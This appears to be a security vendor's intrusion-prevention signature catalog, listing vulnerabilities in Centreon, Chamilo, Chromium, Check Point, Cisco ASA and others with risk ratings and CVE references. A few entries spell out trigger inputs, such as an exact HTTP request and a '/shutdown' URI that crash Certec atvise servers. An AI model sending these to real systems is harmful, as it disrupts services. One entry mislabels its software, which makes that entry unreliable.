https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42429
Back to top

Centreon-Web-poller-Resource-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation causes an SQL injection vulnerability in Centreon Web. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-poller-Resource-SQL-Injection
References:
CVE-2022-41142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41142
Back to top

Centreon-Web-Updatecontactservicecommands-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation when updating service notification commands on a user causes an SQL injection in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Updatecontactservicecommands-SQL-Injection
References:
CVE-2024-23117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23117
Back to top

Centreon-Web-Updatedirectory-SQL-Injection

About this vulnerability: A vulnerability in Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: An SQL Injection vulnerability has been reported in the Centreon Web module. The vulnerability is due to insufficient input validation when updating media upload directories. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CRL-Centreon-Web-Updatedirectory-SQL-Injection
References:
CVE-2024-0637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0637
Back to top

Centreon-Web-Updatelcarelation-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Insufficient input validation when updating menu ACL relations causes an SQL injection vulnerability in Centreon. A successful exploit allows an attakcer to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Centreon-Web-Updatelcarelation-SQL-Injection
References:
CVE-2024-23116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23116
Back to top

Centreon-Web-Updateservicehost-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper validation of user input used in the updateServiceHost function causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Updateservicehost-SQL-Injection
References:
CVE-2024-5723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5723
Back to top

Centreon-Web-Updateservicehost_MC-SQL-Injection

About this vulnerability: A vulnerability in Centreon Project Centreon Web
Risk: Moderate
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: Centreon
Type: Input Validation
Description: Improper validation of user input used in the updateServiceHost_MC function causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Centreon-Web-Updateservicehost_MC-SQL-Injection
References:
CVE-2024-32501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32501
Back to top

Certec-atvise-atserver-Denial-of-Service

About this vulnerability: Certec atvise atserver.exe denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Certec Atvise
Type: Malfunction
Description: A vulnerability in atserver.exe that allows a remote attacker to crash the service by sending the specially crafted tcp packet.
Situation: Generic_CS-Certec-atvise-atserver-Denial-of-Service
Back to top

Certec-atvise-webMI2ADS-Denial-Of-Service

About this vulnerability: A vulnerability in Certec atvise webMI2ADS
Risk: Moderate
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Certec Atvise
Type: Input Validation
Description: There is a denial of service vulnerability in Certec atvise webMI2ADS web server. The device can be shut down by sending a crafted HTTP request with a request URI "/shutdown".
Situation: HTTP_CSU-Certec-atvise-webMI2ADS-Denial-Of-Service
References:
CVE-2011-4882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4882
OSVDB-76276
http://www.osvdb.org/76276
Back to top

Certec-atvise-webMI2ADS-Denial-of-Service-2

About this vulnerability: Certec atvise webMI2ADS version 1.0 and older denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Certec Atvise
Type: Malfunction
Description: A vulnerability in webMI2ADS.exe that allows a remote attacker to crash the service by sending the specially crafted HTTP packet 'GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n'.
Situation: HTTP_CS-Certec-atvise-webMI2ADS-Denial-of-Service-2
Back to top

Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Cerulean Studios Trillian
Risk: High
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trillian
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Cerulean Studios' Trillian instant messenger client application. The application has a boundary error when processing images in the received messages. This could be exploited by remote attackers by sending a malicious message to the target AIM screen name. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user.
Situation: IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow
References:
CVE-2008-5401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5401
BID-32645
http://www.securityfocus.com/bid/32645
OSVDB-50472
http://www.osvdb.org/50472
Back to top

Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow

About this vulnerability: A heap buffer vulnerability in Cerulean Studios' Trillian
Risk: High
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trillian
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Cerulean Studios' Trillian instant messenger client application. The application does not validate input properly when parsing tags in AIM messages. This could be exploited by remote attackers by sending a malicious message to the target user. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user.
Situation: IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow
References:
CVE-2008-5403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5403
BID-32645
http://www.securityfocus.com/bid/32645
OSVDB-50474
http://www.osvdb.org/50474
Back to top

Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894

About this vulnerability: A vulnerability in Progress Software Kemp LoadMaster
Risk: Moderate
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Cesanta Mongoose
Type: Buffer Overflow
Description: An attempt to exploit a vulnerability in Cesanta Mongoose
Situation: Generic_CS-Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894
References:
CVE-2017-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2894
Back to top

Cesanta-Mongoose-Parse_MQTT-DOS

About this vulnerability: A vulnerability in Cesanta Mongoose
Risk: High
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cesanta Mongoose
Type: Infinite Loop
Description: There exists a vulnerability in Cesanta Mongoose, version 6.16, which allows remote attackers to create a denial of service condition by sending crafted requests to a target system, due to the improper handling of objects in memory with the parse_mqtt function.
Situation: Generic_TCP-Cesanta-Mongoose-Parse_MQTT-DOS
Generic_CS-Cesanta-Mongoose-Parse_MQTT-DOS
References:
CVE-2019-19307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19307
Back to top

Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Cesanta Mongoose
Risk: High
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Generic
Software: Cesanta Mongoose
Type: Malfunction
Description: An out of bounds read vulnerability has been reported in Cesanta Mongoose. The vulnerability is due to improper handling of objects in memory within the parse_mqtt function. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to a targeted system. Successful exploitation of the vulnerability could cause denial-of-service conditions or, in the worst case, might cause disclosure of sensitive information.
Situation: Generic_SS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Generic_CS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
References:
CVE-2019-12951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12951
Back to top

Cesar-FTP-Mkd-Command-Buffer-Overflow

About this vulnerability: A Cesar FTP Mkd Command Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cesar FTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Cesar FTP, versions 0.99g and before, which allows remote attackers to execute arbitrary code via a long MKD command.
Situation: FTP_CS-Cesar-FTP-Mkd-Command-Buffer-Overflow
References:
CVE-2006-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961
BID-18586
http://www.securityfocus.com/bid/18586
OSVDB-26364
http://www.osvdb.org/26364
Back to top

Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure

About this vulnerability: A vulnerability in Cgit
Risk: Moderate
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cgit
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability exists in Cgit. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could lead to the disclosure of the system files.
Situation: HTTP_URI-Cgit-Path-Parameter-Directory-Traversal-Information-Disclosure
References:
CVE-2018-14912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14912
Back to top

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8542

About this vulnerability: A vulnerability in Chakra Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Chakra Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8542
References:
CVE-2018-8542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8542
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556

About this vulnerability: A vulnerability in Windows Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the Chackra scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556
References:
CVE-2018-8556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8556
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557

About this vulnerability: A vulnerability in Windows Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the Chackra scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557
References:
CVE-2018-8557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8557
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505
References:
CVE-2018-8505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8505
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Chamilo-BigUpload-WebShell

About this vulnerability: A vulnerability in Chamilo
Risk: Moderate
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Generic
Software: Chamilo
Type: Input Validation
Description: Improper handling of upload operations causes a vulnerability in Chamilo. A successful exploitation allows an attacker to upload PHP code to the target system.
Situation: HTTP_CS-Chamilo-BigUpload-WebShell
References:
CVE-2023-4220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
Back to top

Chamilo-Remote-Command-Execution-CVE-2023-34960

About this vulnerability: A vulnerability in Chamilo
Risk: High
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Platform: Generic
Software: Chamilo
Type: Input Validation
Description: An OS command execution vulnerability has been reported in Chamilo versions up to and including 1.11.18. The vulnerability is due to insufficient user input validation in wsConvertPpt function. A remote, unauthenticated attacker can exploit this vulnerability via a maliciously crafted SOAP request.
Situation: File-TextId_Chamilo-Remote-Command-Execution-CVE-2023-34960
References:
CVE-2023-34960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960
Back to top

CHAOS-RAT-Infection-Traffic

About this vulnerability: CHAOS RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: CHAOS RAT infection traffic was detected.
Situation: Generic_CS-CHAOS-RAT-Infection-Traffic
Back to top

Chaos-RAT-XSS-To-RCE

About this vulnerability: An attempt to exploit a vulnerability in Chaos Remote Access Tool detected
Risk: High
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Chaos RAT
Type: Input Validation
Description: A vulnerability in Chaos Remote Access Tool, version 5.0.8, which allows remote attackers to execute arbitrary code when generating a new executable.
Situation: HTTP_CRL-Chaos-RAT-XSS-To-RCE
References:
CVE-2024-30850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30850
Back to top

Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow

About this vulnerability: Chasys Draw IES BMP Image Processing Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Chasys Draw
Type: Buffer Overflow
Description: An input validation vulnerability exists in Chasys Draw IES BMP file parsing. An attacker could trigger this issue via modified BMP file.
Situation: File-Binary_Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow
References:
CVE-2013-3928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3928
BID-61463
http://www.securityfocus.com/bid/61463
OSVDB-95689
http://www.osvdb.org/95689
Back to top

Check-Point-Firewall-1-HTTP-Parsing-Format-String-Vulnerabilities

About this vulnerability: A vulnerability in Check Point Software Technologies Firewall-1
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FireWall-1
Type: Buffer Overflow
Description: A vulnerability exists in the HTTP protocol parser used by several components of Check Point Firewall-1. The vulnerability can be triggered by sending certain malformed fields in an HTTP request, and may be exploited to crash the firewall or to execute code of the attacker's choice on the firewall. This vulnerability has been described as a format-string problem, however, it has been found that format specifiers are not required to trigger the vulnerability. The behaviour of the attack target will vary depending on the sophistication of the exploit attempt. A simple exploit with sufficient characters in the scheme of the requested URI may cause the in.httpd process handling the request to crash due to an access violation (raising a SIGSEGV). This occurs due to an overflow on the heap. It is possible that this may be exploited to cause arbitrary code execution. The simple exploits do not cause a denial of service as the fwd process will re-start in.ahttpd if there is not one currently executing when another HTTP request is received. A stack trace is shown below from an in.ahttpd process under attack, showing the result of running the exploit. It is believed the SIGSEGV is caused by an overflow in the heap into a free()'d block whose pointers are now invalid causing an access violation when they are dereferenced during a malloc() call.
Situation: HTTP_CSU-Too-Large-URI-Scheme
References:
CVE-2004-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0039
BID-9581
http://www.securityfocus.com/bid/9581
Back to top

Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919

About this vulnerability: A vulnerability in Check Point Security Gateway
Risk: High
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Check Point Security Gateway
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Check Point Security Gateways. A remote, unauthenticated attacker can leverage this vulnerability to obtain sensitive information such as passwords.
Situation: HTTP_CS-Check-Point-Security-Gateway-Information-Disclosure-CVE-2024-24919
References:
CVE-2024-24919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24919
Back to top

Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow

About this vulnerability: A vulnerability in Check Point Software Technologies Provider-1
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FireWall-1
Type: Malfunction
Description: There is a vulnerability in the way Check Point VPN-1 handles the negotiation of a VPN tunnel with a remote client. It is possible for a malicious client to craft a malformed packet designed to generate a memory write violation on the remote server. A successful attack would cause restart of the VPN process on the Checkpoint firewall. When the vulnerability is exploited, an unhandled memory write violation is triggered in the CheckPoint VPN process due to a null pointer dereference. This will cause the remote ISAKMP service to terminate. After the service terminates, it will be restarted by the VPN-1 supervisor module, and begin to service ISAKMP requests again.
Situation: Generic_UDP-Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow
References:
CVE-2004-0699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0699
BID-10820
http://www.securityfocus.com/bid/10820
OSVDB-8290
http://www.osvdb.org/8290
Back to top

CHM-Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow

About this vulnerability: itss.dll parses compiled HTML help files incorrectly allowing buffer overflow
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer; Microsoft Outlook; Microsoft Outlook Express
Type: Buffer Overflow
Description: A compiled HTML help file (.CHM) with the "chunk length" header field set to anything between 0xFFFFFFE8 and 0xFFFFFFFF will cause an integer overflow when allocating memory, allowing arbitrary code execution with the user's privileges. Internet Explorer and Outlook use the vulnerable component to display .chm files, and these applications can open the files without user interaction when using the 'ms-its' protocol specification.
Situation: HTTP_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
File-Binary_Microsoft-Compiled-HTML-Help-Itss-Buffer-Overflow
References:
CVE-2005-1208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1208
BID-13953
http://www.securityfocus.com/bid/13953
MS05-026
http://technet.microsoft.com/security/bulletin/MS05-026
Back to top

Chrome-Remote-Desktop-Usage

About this vulnerability: Chrome Remote Desktop Usage
Risk: Low
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Google Chrome Remote Desktop
Type: Remote Control
Description: Google's Chrome Remote Desktop is a remote control browser extension that allows sharing of desktop connections across machines. Use of this kind of applications may be considered a security risk in controlled environments. Chrome Remote Desktop uses also Google Talk technology for sending its messages.
Situation: Generic_UDP-Chrome-Remote-Desktop-Usage
Generic_Google-Talk-Instant-Messaging-Network-Usage
Back to top

Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass

About this vulnerability: A vulnerability in Chromium and Webkit
Risk: Moderate
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Platform: Generic
Software: Chrome; Microsoft Edge; Safari
Type: Malfunction
Description: An iframe sandbox security bypass vulnerability has been reported in Chromium PopupBlocker (CVE-2021-30533) and Webkit (CVE-2021-1765). This vulnerability allows a maliciously crafted iframe to bypass the restrictions intended to prevent automatic redirections, which can be used in malvertising campaigns.
Situation: File-Text_Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass
References:
CVE-2021-30533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30533
Back to top

Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632

About this vulnerability: An attempt to exploit a vulnerability in Chromium detected
Risk: High
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Chromium detected.
Situation: File-Text_Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632
References:
CVE-2021-30632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632
Back to top

Chromium-V8-Turbofan-Type-Confusion

About this vulnerability: An attempt to exploit a vulnerability in Chromium detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Chrome
Type: Malfunction
Description: An attempt to exploit a vulnerability in Chromium detected.
Situation: File-Text_Chromium-V8-Turbofan-Type-Confusion
References:
CVE-2020-16009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009
Back to top

Chunked-HTTP-1.0-Response

About this vulnerability: Chunked transfer encoding in an HTTP/1.0 response
Risk: Low
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: Chunked transfer encoding is not defined for HTTP/1.0, however some systems including browsers may interpret a Transfer-Encoding header within an HTTP/1.0 response. This vulnerability may be exploited in an attempt to evade inspection.
Situation: HTTP_SHS-Chunked-HTTP-1.0-Response
Back to top

ChurchInfo-Authenticated-RCE

About this vulnerability: A vulnerability in ChurchInfo.
Risk: High
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: ChurchInfo
Type: Input Validation
Description: A vulnerability in the logic in the CartView.php page of ChurchInfo, versions 1.2.13 through 1.3.0, which allows remote attackers to execute arbitrary code by uploading an attachment for a draft email which will then be placed in the /tmp_attach/ folder of the ChurchInfo web server, which can then be executed by the web daemon by browsing the location of the uploaded file.
Situation: HTTP_CS-ChurchInfo-Authenticated-RCE
References:
CVE-2021-43258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43258
Back to top

CirceOS-SaveWeb-Portal-Remote-File-Include-Vulnerability

About this vulnerability: CisceOS SaveWeb Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CirceOS SaveWeb
Type: Input Validation
Description: The CirceOS SaveWeb Portal is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation: HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise-2
HTTP_CRL-CirceOS-SaveWeb-Poll-Remote-Code-Injection-Compromise
References:
CVE-2006-4012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4012
BID-19306
http://www.securityfocus.com/bid/19306
Back to top

CirceOS-SaveWeb-Portal-Site-Path-Remote-File-Include-Vulnerability

About this vulnerability: CisceOS SaveWeb Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CirceOS SaveWeb
Type: Input Validation
Description: The CirceOS SaveWeb Portal is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation: HTTP_CRL-CirceOS-SaveWeb-Site-Path-Remote-Code-Injection-Compromise
References:
CVE-2005-2687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2687
BID-19306
http://www.securityfocus.com/bid/19306
Back to top

Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580

About this vulnerability: A vulnerability in Cisco Adaptive Security Appliance
Risk: Moderate
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in the web services interface of Cisco Adaptive Security Appliance Software. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user into clicking a crafted link. Successful exploitation may allow the attacker to execute arbitrary script code in the context of the interface.
Situation: HTTP_CRL-Cisco-Adaptive-Security-Appliance-Cross-Site-Scripting-CVE-2020-3580
References:
CVE-2020-3580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3580
Back to top

Cisco-Adaptive-Security-Appliance-IKEv1-And-IKE2-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Cisco Systems Adaptive Security Appliance (ASA)
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Buffer Overflow
Description: Arbitrary code can be run with kernel privileges by exploiting a heap buffer overflow caused by incorrect handling of IKE packets in the Cisco ASA appliance.
Situation: Generic_UDP-Cisco-Adaptive-Security-Appliance-IKEv1-And-IKEv2-Heap-Buffer-Overflow
References:
CVE-2016-1287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287
Back to top

Cisco-Adaptive-Security-Appliance-Information-Disclosure

About this vulnerability: A vulnerability in Cisco Adaptive Security Appliance
Risk: High
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Cisco Adaptive Security Appliance (ASA). A remote, unauthenticated attacker can exploit this vulnerability to retrieve memory contents by sending a crafted HTTP GET request.
Situation: HTTP_CSU-Cisco-Adaptive-Security-Appliance-Information-Disclosure
References:
CVE-2020-3259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3259
Back to top

Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command

About this vulnerability: A Cisco Adaptive Security Appliance Invalid-CLI-Command vulnerability
Risk: High
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Buffer Overflow
Description: A vulnerability in multiple versions of Cisco Adaptive Security Appliance that allows remote attackers to gain privileges via invalid CLI commands. This vulnerability was released by Shadow Brokers named EPICBANANA.
Situation: Telnet_CS-Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command
References:
CVE-2016-6367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6367
Back to top

Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow

About this vulnerability: A Cisco Adaptive Security Appliance SNMP Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Buffer Overflow
Description: A vulnerability in multiple versions of Cisco Adaptive Security Appliance that allows remote attackers to execute arbitrary code by sending crafted SNMP messages. This vulnerability was released by Shadow Brokers named ExtraBacon.
Situation: SNMP-UDP_Cisco-Adaptive-Security-Appliance-SNMP-Buffer-Overflow
References:
CVE-2016-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366
Back to top

Cisco-Adaptive-Security-Appliance-SNMP-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Cisco ASA SNMP
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software. This allows an attacker to execute arbitrary code and obtain full system control of the affected system. This vulnerability has been utilized by the ExtraBacon exploit.
Situation: Generic_UDP-Cisco-ASA-SNMP-ExtraBacon-Exploit
SNMP-UDP_Cisco-ASA-SNMP-ExtraBacon-Exploit
References:
CVE-2016-6366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366
Back to top

Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read

About this vulnerability: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Malfunction
Description: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected.
Situation: HTTP_CSU-Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read
References:
CVE-2020-3452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452
Back to top

Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free

About this vulnerability: A vulnerability in Cisco Systems Adaptive Security Appliance (ASA)
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Malfunction
Description: Improper XML parsing causes a double free vulnerability in Cisco ASA. A successful attack can allow arbitrary code execution.
Situation: HTTP_CS-Cisco-Adaptive-Security-Appliance-Webvpn-XML-Parser-Double-Free
References:
CVE-2018-0101
